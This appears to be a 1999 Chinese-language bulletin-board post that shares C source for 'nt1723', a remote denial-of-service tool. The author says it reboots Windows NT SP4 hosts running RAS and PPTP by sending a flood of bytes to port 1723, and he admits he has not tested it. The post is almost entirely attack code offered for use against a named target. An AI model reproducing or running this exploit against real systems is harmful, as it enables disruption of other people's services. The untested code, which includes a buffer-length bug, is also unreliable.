发信人: zer9()
整理人: williamlong(1999-09-28 22:15:24), 站内信件
|
下面的程序可远程重启动安装了PAS&PPTP 的winNT sp4.
(port 1723 open)
不过我是根据弱点的描述写的,没有试过,
if(我的理解&&弱点描述)
success!;
不论成功与否,tell me ,please.
[email protected]
----Cut Here------------------------------------------------
/* nt1723
* rem0te reb00t winNt sp4 with RAS&PPTP
* test on slackware 2.0.34
* cc nt1723.c -o nt1723
* b y
* z e r 9
* [email protected]
*/
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#define FLOOD_PORT 1723
int main(int argc,char *argv[])
{
struct sockaddr_in sin;
struct hostent *nt;
struct in_addr Target;
int s;
char sendbuf[256];
printf("nt1723 by zer9 mailto:[email protected] \n");
printf("usage: %s <Target>\n",argv[0]);
if(argc!=2) return -1;
if((nt=gethostbyname(argv[1]))!=NULL)
bcopy(nt->h_addr,(char *)&Target.s_addr,nt->h_length);
else
Target.s_addr=inet_addr(argv[1]);
if(Target.s_addr==-1)
{
perror("gethostbyname");
return -1;
}
if((s=socket(AF_INET,SOCK_STREAM,0))<0)
{
perror("socket");
return -1;
}
sin.sin_family=AF_INET;
sin.sin_port=htons(FLOOD_PORT);
sin.sin_addr.s_addr=Target.s_addr;
if(connect(s,(struct sockaddr*)&sin,sizeof(sin))<0)
{
perror("connect");
return -1;
}
memset(sendbuf,'a',256);
send(s,sendbuf,strlen(sendbuf),0);
printf("flooded\n");
close(s);
return;
}
--
※ 来源:.月光软件站 http://www.moon-soft.com.[FROM: 202.103.105.75]
|
|